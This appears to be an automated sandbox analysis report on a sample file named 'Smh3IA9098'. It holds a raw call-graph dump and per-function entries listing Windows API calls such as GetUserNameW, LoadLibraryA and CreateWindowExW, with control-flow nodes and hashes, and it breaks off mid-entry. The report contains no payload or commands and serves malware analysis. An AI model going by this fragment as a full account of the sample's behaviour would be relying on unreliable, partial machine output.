GetModuleHandleW 33948->33949 33950 677e3c1 33948->33950 33949->33950 33950->33950 33954 677e31a 33953->33954 33958 677e840 GetModuleHandleW 33954->33958 33959 677e810 GetModuleHandleW 33954->33959 33955 677e398 33957 677e3c1 33955->33957 33989 677bf74 33955->33989 33958->33955 33959->33955 33961 677bf74 GetModuleHandleW 33960->33961 33962 677d00b 33961->33962 33963 677d023 33962->33963 33967 677d270 GetModuleHandleW LoadLibraryExW 33962->33967 33968 677d280 GetModuleHandleW LoadLibraryExW 33962->33968 33963->33937 33964 677d220 GetModuleHandleW 33966 677d24d 33964->33966 33965 677d01b 33965->33963 33965->33964 33966->33937 33967->33965 33968->33965 33970 677cff2 33969->33970 33973 677d023 33969->33973 33971 677d00b 33970->33971 33972 677bf74 GetModuleHandleW 33970->33972 33971->33973 33977 677d270 GetModuleHandleW LoadLibraryExW 33971->33977 33978 677d280 GetModuleHandleW LoadLibraryExW 33971->33978 33972->33971 33973->33937 33974 677d220 GetModuleHandleW 33976 677d24d 33974->33976 33975 677d01b 33975->33973 33975->33974 33976->33937 33977->33975 33978->33975 33980 677e86d 33979->33980 33981 677e8ee 33980->33981 33982 677e9a1 GetModuleHandleW 33980->33982 33983 677e9b0 GetModuleHandleW 33980->33983 33982->33981 33983->33981 33985 677e86d 33984->33985 33986 677e8ee 33985->33986 33987 677e9a1 GetModuleHandleW 33985->33987 33988 677e9b0 GetModuleHandleW 33985->33988 33987->33986 33988->33986 33990 677d1d8 GetModuleHandleW 33989->33990 33992 677d24d 33990->33992 33992->33957 33994 2aa106b 33993->33994 33997 2aa0f47 33993->33997 34013 2aa10a4 33994->34013 34062 2aa1670 33994->34062 33995 2aa1056 33995->33843 33996 2aa0b40 2 API calls 33996->33997 33997->33995 33997->33996 34011 2aa1062 2 API calls 33997->34011 34017 2aaf4d8 33997->34017 34022 2aaf4c9 33997->34022 34027 2aa1070 33997->34027 34042 2aaf7ff 33997->34042 34052 2aaf810 33997->34052 33998 2aa10b4 33999 2aa0b40 2 API calls 33998->33999 34000 2aa10d4 33999->34000 34001 2aa1100 34000->34001 34002 2aa0b40 2 API calls 34000->34002 34001->33843 34003 2aa10f4 34002->34003 34004 2aa0b40 2 API calls 34003->34004 34004->34001 34010 2aa10ac 34010->33998 34074 2aadcb0 34010->34074 34081 2aadcd0 34010->34081 34011->33997 34013->34010 34068 2aadb69 34013->34068 34018 2aaf4f0 34017->34018 34019 2aaf54f 34018->34019 34087 2aaf088 34018->34087 34023 2aaf4d8 34022->34023 34024 2aaf54f 34023->34024 34025 2aaf088 GetUserNameW 34023->34025 34026 2aaf541 34025->34026 34026->33997 34028 2aa1089 34027->34028 34029 2aa10a4 34028->34029 34038 2aa1670 2 API calls 34028->34038 34030 2aa10ac 34029->34030 34039 2aadb69 2 API calls 34029->34039 34031 2aa10b4 34030->34031 34040 2aadcb0 2 API calls 34030->34040 34041 2aadcd0 2 API calls 34030->34041 34032 2aa0b40 2 API calls 34031->34032 34033 2aa10d4 34032->34033 34034 2aa1100 34033->34034 34035 2aa0b40 2 API calls 34033->34035 34034->33997 34036 2aa10f4 34035->34036 34037 2aa0b40 2 API calls 34036->34037 34037->34034 34038->34029 34039->34030 34040->34031 34041->34031 34043 2aaf828 34042->34043 34044 2aaf86c 34043->34044 34047 2aaf886 34043->34047 34091 2aaf0a4 GetUserNameW 34044->34091 34048 2aa0b40 2 API calls 34047->34048 34049 2aaf93a 34048->34049 34050 2aa0b40 2 API calls 34049->34050 34051 2aaf99e 34050->34051 34053 2aaf828 34052->34053 34054 2aaf86c 34053->34054 34057 2aaf886 34053->34057 34092 2aaf0a4 GetUserNameW 34054->34092 34058 2aa0b40 2 API calls 34057->34058 34059 2aaf93a 34058->34059 34060 2aa0b40 2 API calls 34059->34060 34061 2aaf99e 34060->34061 34063 2aa1696 34062->34063 34064 2aa0b40 2 API calls 34063->34064 34067 2aa16ba 34064->34067 34065 2aa174c 34066 2aa0b40 2 API calls 34066->34067 34067->34065 34067->34066 34069 2aadb72 34068->34069 34071 2aadbbb 34068->34071 34070 2aa0b40 2 API calls 34069->34070 34070->34071 34072 2aadc3c 34071->34072 34073 2aa0b40 2 API calls 34071->34073 34073->34071 34075 2aadcba 34074->34075 34076 2aadd0f 34074->34076 34075->33998 34077 2aa0b40 2 API calls 34076->34077 34078 2aadd1a 34077->34078 34079 2aaddfe 34078->34079 34080 2aa0b40 GetUserNameW GetUserNameW 34078->34080 34080->34078 34082 2aadcdd 34081->34082 34083 2aa0b40 2 API calls 34082->34083 34084 2aadd1a 34082->34084 34083->34084 34085 2aaddfe 34084->34085 34086 2aa0b40 GetUserNameW GetUserNameW 34084->34086 34086->34084 34089 2aaf610 GetUserNameW 34087->34089 34090 2aaf75d 34089->34090 34093 6727750 34094 6727778 34093->34094 34097 67277a4 34093->34097 34095 6727781 34094->34095 34098 6727064 34094->34098 34099 672706f 34098->34099 34100 6727a9b 34099->34100 34102 6727080 34099->34102 34100->34097 34103 6727ad0 OleInitialize 34102->34103 34105 6727b34 34103->34105 34105->34100 34195 6720040 34196 67200a8 CreateWindowExW 34195->34196 34198 6720164 34196->34198 34198->34198 34199 6773940 34200 67739a6 34199->34200 34201 6773a55 34200->34201 34204 6773af3 34200->34204 34208 6773b00 34200->34208 34205 6773afd 34204->34205 34211 677351c 34205->34211 34209 6773b2e 34208->34209 34210 677351c DuplicateHandle 34208->34210 34209->34201 34210->34209 34212 6773b68 DuplicateHandle 34211->34212 34213 6773b2e 34212->34213 34213->34201 34106 67201f8 34107 672021e 34106->34107 34111 6721580 34107->34111 34119 672156d 34107->34119 34114 67215ad 34111->34114 34112 67215e1 34116 67215df 34112->34116 34137 6721084 34112->34137 34114->34112 34115 67215d1 34114->34115 34127 67216f8 34115->34127 34132 6721708 34115->34132 34122 67215ad 34119->34122 34120 67215e1 34121 6721084 CallWindowProcW 34120->34121 34124 67215df 34120->34124 34121->34124 34122->34120 34123 67215d1 34122->34123 34125 67216f8 CallWindowProcW 34123->34125 34126 6721708 CallWindowProcW 34123->34126 34125->34124 34126->34124 34128 6721702 34127->34128 34141 67217c0 34128->34141 34144 67217af 34128->34144 34129 67217a8 34129->34116 34134 672171c 34132->34134 34133 67217a8 34133->34116 34135 67217c0 CallWindowProcW 34134->34135 34136 67217af CallWindowProcW 34134->34136 34135->34133 34136->34133 34138 672108f 34137->34138 34139 6722b6a CallWindowProcW 34138->34139 34140 6722b19 34138->34140 34139->34140 34140->34116 34142 67217d1 34141->34142 34147 6722ab0 34141->34147 34142->34129 34145 67217d1 34144->34145 34146 6722ab0 CallWindowProcW 34144->34146 34145->34129 34146->34145 34148 6721084 CallWindowProcW 34147->34148 34149 6722aba 34148->34149 34149->34142 34214 2aa5a10 34215 2aa5a2e 34214->34215 34218 2aa489c 34215->34218 34217 2aa5a65 34220 2aa7530 LoadLibraryA 34218->34220 34221 2aa7629 34220->34221 34150 6770c78 34151 6770c36 34150->34151 34152 6770c73 34151->34152 34155 6771987 34151->34155 34160 6771998 34151->34160 34156 67719ae 34155->34156 34157 6771a5f 34156->34157 34165 67752aa 34156->34165 34170 67752b8 34156->34170 34157->34151 34161 67719ae 34160->34161 34162 6771a5f 34161->34162 34163 67752aa 2 API calls 34161->34163 34164 67752b8 2 API calls 34161->34164 34162->34151 34163->34161 34164->34161 34166 67752d0 34165->34166 34167 6775bbe 34166->34167 34175 6777741 34166->34175 34180 6777750 34166->34180 34167->34156 34171 67752d0 34170->34171 34172 6775bbe 34171->34172 34173 6777741 2 API calls 34171->34173 34174 6777750 2 API calls 34171->34174 34172->34156 34173->34171 34174->34171 34176 6777755 34175->34176 34177 6777783 34176->34177 34185 677c7b0 34176->34185 34190 677c798 34176->34190 34177->34166 34181 6777755 34180->34181 34182 6777783 34181->34182 34183 677c7b0 2 API calls 34181->34183 34184 677c798 2 API calls 34181->34184 34182->34166 34183->34181 34184->34181 34187 677c7c7 34185->34187 34186 677cd26 34186->34176 34187->34186 34188 2aa0b32 2 API calls 34187->34188 34189 2aa0b40 2 API calls 34187->34189 34188->34187 34189->34187 34192 677c7c7 34190->34192 34191 677cd26 34191->34176 34192->34191 34193 2aa0b32 2 API calls 34192->34193 34194 2aa0b40 2 API calls 34192->34194 34193->34192 34194->34192

                                                                                              Executed Functions

                                                                                              Function 02AAF088 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1534 2aaf088-2aaf66f 1536 2aaf6da-2aaf6de 1534->1536 1537 2aaf671-2aaf69c 1534->1537 1538 2aaf709-2aaf714 1536->1538 1539 2aaf6e0-2aaf703 1536->1539 1545 2aaf69e-2aaf6a0 1537->1545 1546 2aaf6cc 1537->1546 1540 2aaf720-2aaf75b GetUserNameW 1538->1540 1541 2aaf716-2aaf71e 1538->1541 1539->1538 1543 2aaf75d-2aaf763 1540->1543 1544 2aaf764-2aaf77a 1540->1544 1541->1540 1543->1544 1551 2aaf77c-2aaf788 1544->1551 1552 2aaf790-2aaf7b7 1544->1552 1549 2aaf6c2-2aaf6ca 1545->1549 1550 2aaf6a2-2aaf6ac 1545->1550 1548 2aaf6d1-2aaf6d4 1546->1548 1548->1536 1549->1548 1555 2aaf6ae 1550->1555 1556 2aaf6b0-2aaf6be 1550->1556 1551->1552 1560 2aaf7b9-2aaf7bd 1552->1560 1561 2aaf7c7 1552->1561 1555->1556 1556->1556 1558 2aaf6c0 1556->1558 1558->1549 1560->1561 1562 2aaf7bf 1560->1562 1563 2aaf7c8 1561->1563 1562->1561 1563->1563
                                                                                              APIs
                                                                                              • GetUserNameW.ADVAPI32(00000000,00000000), ref: 02AAF74B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.521744443.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_2aa0000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameUser
                                                                                              • String ID:
                                                                                              • API String ID: 2645101109-0
                                                                                              • Opcode ID: 9f3401dce3e092b1f9fb2027622372c2dad964898f71fca72c8e6198465c4ef0
                                                                                              • Instruction ID: 63ec51390114f7662fe1cc0b524edfcaa6f532bf980eef83987f125e7050a351
                                                                                              • Opcode Fuzzy Hash: 9f3401dce3e092b1f9fb2027622372c2dad964898f71fca72c8e6198465c4ef0
                                                                                              • Instruction Fuzzy Hash: DD513670D00258CFDB18CFA9C89479DBBB1BF48314F14812AE815BB751DBB5A844CF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0677CFF8 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1317 677cff8-677d00d call 677bf74 1320 677d023-677d027 1317->1320 1321 677d00f 1317->1321 1322 677d03b-677d07c 1320->1322 1323 677d029-677d033 1320->1323 1374 677d015 call 677d270 1321->1374 1375 677d015 call 677d280 1321->1375 1328 677d07e-677d086 1322->1328 1329 677d089-677d097 1322->1329 1323->1322 1324 677d01b-677d01d 1324->1320 1327 677d158-677d19b 1324->1327 1356 677d19c-677d1a3 1327->1356 1328->1329 1331 677d0bb-677d0bd 1329->1331 1332 677d099-677d09e 1329->1332 1333 677d0c0-677d0c7 1331->1333 1334 677d0a0-677d0a7 call 677bf80 1332->1334 1335 677d0a9 1332->1335 1336 677d0d4-677d0db 1333->1336 1337 677d0c9-677d0d1 1333->1337 1340 677d0ab-677d0b9 1334->1340 1335->1340 1341 677d0dd-677d0e5 1336->1341 1342 677d0e8-677d0f1 call 67743a4 1336->1342 1337->1336 1340->1333 1341->1342 1347 677d0f3-677d0fb 1342->1347 1348 677d0fe-677d103 1342->1348 1347->1348 1350 677d105-677d10c 1348->1350 1351 677d121-677d12e 1348->1351 1350->1351 1352 677d10e-677d11e call 67799f8 call 677bf90 1350->1352 1357 677d151-677d157 1351->1357 1358 677d130-677d14e 1351->1358 1352->1351 1362 677d1a5-677d1d4 1356->1362 1363 677d211-677d218 1356->1363 1358->1357 1362->1356 1373 677d1d6-677d20e 1362->1373 1365 677d220-677d24b GetModuleHandleW 1363->1365 1366 677d21a-677d21d 1363->1366 1368 677d254-677d268 1365->1368 1369 677d24d-677d253 1365->1369 1366->1365 1369->1368 1373->1363 1374->1324 1375->1324
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.527062982.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_6770000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule
                                                                                              • String ID:
                                                                                              • API String ID: 4139908857-0
                                                                                              • Opcode ID: 2dfd4693672a6a23c0e8180d8b96fef55bce56d2550cbdee75ff8294d521d9ed
                                                                                              • Instruction ID: 296df99d384b5fc2b55b828bfcfaf59748aea9ab01a951b7a7f9314cceb4856b
                                                                                              • Opcode Fuzzy Hash: 2dfd4693672a6a23c0e8180d8b96fef55bce56d2550cbdee75ff8294d521d9ed
                                                                                              • Instruction Fuzzy Hash: E1712470A10B058FDBA4DF6AD54476ABBF1FF88304F00892AE48AD7A40D775E846CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 06720007 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1511 6720007-6720012 1512 6720014-6720019 1511->1512 1513 672001a 1511->1513 1512->1513 1514 6720022 1513->1514 1515 672001c-672001e 1513->1515 1519 6720024-6720025 1514->1519 1520 672002a-67200a6 1514->1520 1517 6720020 1515->1517 1518 6720026-6720028 1515->1518 1517->1514 1518->1520 1519->1518 1521 67200b1-67200b8 1520->1521 1522 67200a8-67200ae 1520->1522 1523 67200c3-67200fb 1521->1523 1524 67200ba-67200c0 1521->1524 1522->1521 1525 6720103-6720162 CreateWindowExW 1523->1525 1524->1523 1526 6720164-672016a 1525->1526 1527 672016b-67201a3 1525->1527 1526->1527 1531 67201b0 1527->1531 1532 67201a5-67201a8 1527->1532 1533 67201b1 1531->1533 1532->1531 1533->1533
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06720152
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.526849138.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_6720000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: d7e575d4076c672355778af2ab275a95b716b47bee2a9aa44c8435b9d4751e26
                                                                                              • Instruction ID: 74a1edd181191ad73edeba1905a44d016ab93558a77b511154c62349121b47b5
                                                                                              • Opcode Fuzzy Hash: d7e575d4076c672355778af2ab275a95b716b47bee2a9aa44c8435b9d4751e26
                                                                                              • Instruction Fuzzy Hash: F35124B1C00359DFDB11CFA9C890ADEBFB2BF49310F24816AE404AB211D7B49985CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02AAF0A4 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1564 2aaf0a4-2aaf66f 1566 2aaf6da-2aaf6de 1564->1566 1567 2aaf671-2aaf69c 1564->1567 1568 2aaf709-2aaf714 1566->1568 1569 2aaf6e0-2aaf703 1566->1569 1575 2aaf69e-2aaf6a0 1567->1575 1576 2aaf6cc 1567->1576 1570 2aaf720-2aaf75b GetUserNameW 1568->1570 1571 2aaf716-2aaf71e 1568->1571 1569->1568 1573 2aaf75d-2aaf763 1570->1573 1574 2aaf764-2aaf77a 1570->1574 1571->1570 1573->1574 1581 2aaf77c-2aaf788 1574->1581 1582 2aaf790-2aaf7b7 1574->1582 1579 2aaf6c2-2aaf6ca 1575->1579 1580 2aaf6a2-2aaf6ac 1575->1580 1578 2aaf6d1-2aaf6d4 1576->1578 1578->1566 1579->1578 1585 2aaf6ae 1580->1585 1586 2aaf6b0-2aaf6be 1580->1586 1581->1582 1590 2aaf7b9-2aaf7bd 1582->1590 1591 2aaf7c7 1582->1591 1585->1586 1586->1586 1588 2aaf6c0 1586->1588 1588->1579 1590->1591 1592 2aaf7bf 1590->1592 1593 2aaf7c8 1591->1593 1592->1591 1593->1593
                                                                                              APIs
                                                                                              • GetUserNameW.ADVAPI32(00000000,00000000), ref: 02AAF74B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.521744443.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_2aa0000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameUser
                                                                                              • String ID:
                                                                                              • API String ID: 2645101109-0
                                                                                              • Opcode ID: e9c25efacf09371bb53cbae941c2dde159594a9a59692795303f4f5d158927f6
                                                                                              • Instruction ID: b19822ef1d08736172b07d66850570247743637db91607b53dafd42f857bf90f
                                                                                              • Opcode Fuzzy Hash: e9c25efacf09371bb53cbae941c2dde159594a9a59692795303f4f5d158927f6
                                                                                              • Instruction Fuzzy Hash: B9512571D00258CFDB18CFA9C8A4B9DBBB1BF48314F14812AE815BB791DBB5A844CF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02AAF605 Relevance: 1.6, APIs: 1, Instructions: 133COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1594 2aaf605-2aaf66f 1595 2aaf6da-2aaf6de 1594->1595 1596 2aaf671-2aaf69c 1594->1596 1597 2aaf709-2aaf714 1595->1597 1598 2aaf6e0-2aaf703 1595->1598 1604 2aaf69e-2aaf6a0 1596->1604 1605 2aaf6cc 1596->1605 1599 2aaf720-2aaf75b GetUserNameW 1597->1599 1600 2aaf716-2aaf71e 1597->1600 1598->1597 1602 2aaf75d-2aaf763 1599->1602 1603 2aaf764-2aaf77a 1599->1603 1600->1599 1602->1603 1610 2aaf77c-2aaf788 1603->1610 1611 2aaf790-2aaf7b7 1603->1611 1608 2aaf6c2-2aaf6ca 1604->1608 1609 2aaf6a2-2aaf6ac 1604->1609 1607 2aaf6d1-2aaf6d4 1605->1607 1607->1595 1608->1607 1614 2aaf6ae 1609->1614 1615 2aaf6b0-2aaf6be 1609->1615 1610->1611 1619 2aaf7b9-2aaf7bd 1611->1619 1620 2aaf7c7 1611->1620 1614->1615 1615->1615 1617 2aaf6c0 1615->1617 1617->1608 1619->1620 1621 2aaf7bf 1619->1621 1622 2aaf7c8 1620->1622 1621->1620 1622->1622
                                                                                              APIs
                                                                                              • GetUserNameW.ADVAPI32(00000000,00000000), ref: 02AAF74B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.521744443.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_2aa0000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameUser
                                                                                              • String ID:
                                                                                              • API String ID: 2645101109-0
                                                                                              • Opcode ID: 26412b753172ddb069da30ca82c6fddc30d6a639d2c31426b2b74b4ffd9abd85
                                                                                              • Instruction ID: 57acbad1c3d2d11625b29427f0b858dc87786172e22a77bb8d72165ba8045a52
                                                                                              • Opcode Fuzzy Hash: 26412b753172ddb069da30ca82c6fddc30d6a639d2c31426b2b74b4ffd9abd85
                                                                                              • Instruction Fuzzy Hash: D1512471D00218CFDB18CFA9C8A579DBBB1BF48314F14812AE819BB790DBB59845CF95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 06720040 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1623 6720040-67200a6 1624 67200b1-67200b8 1623->1624 1625 67200a8-67200ae 1623->1625 1626 67200c3-6720162 CreateWindowExW 1624->1626 1627 67200ba-67200c0 1624->1627 1625->1624 1629 6720164-672016a 1626->1629 1630 672016b-67201a3 1626->1630 1627->1626 1629->1630 1634 67201b0 1630->1634 1635 67201a5-67201a8 1630->1635 1636 67201b1 1634->1636 1635->1634 1636->1636
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06720152
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.526849138.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_6720000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 5ebe5dd8e8bc8da190107b0325ea321adf376be9ca938f60eb7bd8e680ea9e29
                                                                                              • Instruction ID: da3088ebafbeb26205cc23cfa6b44c1c641c0dcf2f54035e98cf446ef0642947
                                                                                              • Opcode Fuzzy Hash: 5ebe5dd8e8bc8da190107b0325ea321adf376be9ca938f60eb7bd8e680ea9e29
                                                                                              • Instruction Fuzzy Hash: F941BFB1D10359DFDF14CF9AC884ADEBBB5BF48314F24812AE819AB210D7B59985CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02AA489C Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1637 2aa489c-2aa7587 1639 2aa75db-2aa7627 LoadLibraryA 1637->1639 1640 2aa7589-2aa75ae 1637->1640 1644 2aa7629-2aa762f 1639->1644 1645 2aa7630-2aa7661 1639->1645 1640->1639 1643 2aa75b0-2aa75b2 1640->1643 1647 2aa75b4-2aa75be 1643->1647 1648 2aa75d5-2aa75d8 1643->1648 1644->1645 1650 2aa7663-2aa7667 1645->1650 1651 2aa7671 1645->1651 1652 2aa75c2-2aa75d1 1647->1652 1653 2aa75c0 1647->1653 1648->1639 1650->1651 1654 2aa7669 1650->1654 1656 2aa7672 1651->1656 1652->1652 1655 2aa75d3 1652->1655 1653->1652 1654->1651 1655->1648 1656->1656
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNELBASE(?), ref: 02AA7617
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.521744443.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_2aa0000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: 4eb36bbb173064b47800106136c66cdd921060d9df05164c8e33f4902f848473
                                                                                              • Instruction ID: 0b7ce128294c6cb36e33725ffc96d8f381266ba0bc341afa519326333e45cf53
                                                                                              • Opcode Fuzzy Hash: 4eb36bbb173064b47800106136c66cdd921060d9df05164c8e33f4902f848473
                                                                                              • Instruction Fuzzy Hash: 264146B0E002598FDB10CFA9D89479EFBF2EF48314F10812AE815A7384DBB49885CF95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 06721084 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1657 6721084-6722b0c 1660 6722b12-6722b17 1657->1660 1661 6722bbc-6722bdc 1657->1661 1662 6722b6a-6722ba2 CallWindowProcW 1660->1662 1663 6722b19-6722b50 1660->1663 1667 6722bdf-6722bec 1661->1667 1665 6722ba4-6722baa 1662->1665 1666 6722bab-6722bba 1662->1666 1669 6722b52-6722b58 1663->1669 1670 6722b59-6722b68 1663->1670 1665->1666 1666->1667 1669->1670 1670->1667
                                                                                              APIs
                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 06722B91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.526849138.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_6720000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallProcWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2714655100-0
                                                                                              • Opcode ID: abf0e0e5f1e6e48b5724b592d9bb57005e0b81ddfd6a01ebc99b23c6f6536a46
                                                                                              • Instruction ID: d7e9cc0252880bf9bd858f24b14a1b9dc03d4c62020c50eb78cb8dee9d239efd
                                                                                              • Opcode Fuzzy Hash: abf0e0e5f1e6e48b5724b592d9bb57005e0b81ddfd6a01ebc99b23c6f6536a46
                                                                                              • Instruction Fuzzy Hash: CE413AB4900215CFDB54CF99C488BAABBF6FF88314F258459E529AB321D774E941CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 02AA7524 Relevance: 1.6, APIs: 1, Instructions: 95libraryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1673 2aa7524-2aa7587 1674 2aa75db-2aa7627 LoadLibraryA 1673->1674 1675 2aa7589-2aa75ae 1673->1675 1679 2aa7629-2aa762f 1674->1679 1680 2aa7630-2aa7661 1674->1680 1675->1674 1678 2aa75b0-2aa75b2 1675->1678 1682 2aa75b4-2aa75be 1678->1682 1683 2aa75d5-2aa75d8 1678->1683 1679->1680 1685 2aa7663-2aa7667 1680->1685 1686 2aa7671 1680->1686 1687 2aa75c2-2aa75d1 1682->1687 1688 2aa75c0 1682->1688 1683->1674 1685->1686 1689 2aa7669 1685->1689 1691 2aa7672 1686->1691 1687->1687 1690 2aa75d3 1687->1690 1688->1687 1689->1686 1690->1683 1691->1691
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNELBASE(?), ref: 02AA7617
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.521744443.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_2aa0000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: a81bd3c7f3728d0c5a1ab2d689e49cf4f5674574cc730121e776495c9ac0ec2c
                                                                                              • Instruction ID: 9913862150d1b48b1103527bfd886ba6fcc97d5a9f321abf4fd72d2ad95dab1b
                                                                                              • Opcode Fuzzy Hash: a81bd3c7f3728d0c5a1ab2d689e49cf4f5674574cc730121e776495c9ac0ec2c
                                                                                              • Instruction Fuzzy Hash: 9E4135B0E002598FDB10CFA9D89579EFBF1FF48314F10852AD815A7284DBB89885CF85
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0677351C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2312 677351c-6773bfc DuplicateHandle 2314 6773c05-6773c22 2312->2314 2315 6773bfe-6773c04 2312->2315 2315->2314
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,06773B2E,?,?,?,?,?), ref: 06773BEF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.527062982.0000000006770000.00000040.00000800.00020000.00000000.sdmp, Offset: 06770000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_6770000_Smh3IA9098.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 82fe2fea490195aa5b9a08b46c4bf5e7aaca28d68d00c5f93d486b8588797fc1
                                                                                              • Instruction ID: 7c5a6efbe4feaa9ce4f286b13d820434f01d91301615223f492e7b2d0d443ddf
                                                                                              • Opcode Fuzzy Hash: 82fe2fea490195aa5b9a08b46c4bf5e7aaca28d68d00c5f93d486b8588797fc1
                                                                                              • Instruction Fuzzy Hash: CD21F4B5900248DFDB10CF9AD984AEEBBF4EB48320F14841AE914B3310D378A944DFA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 06773B60 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
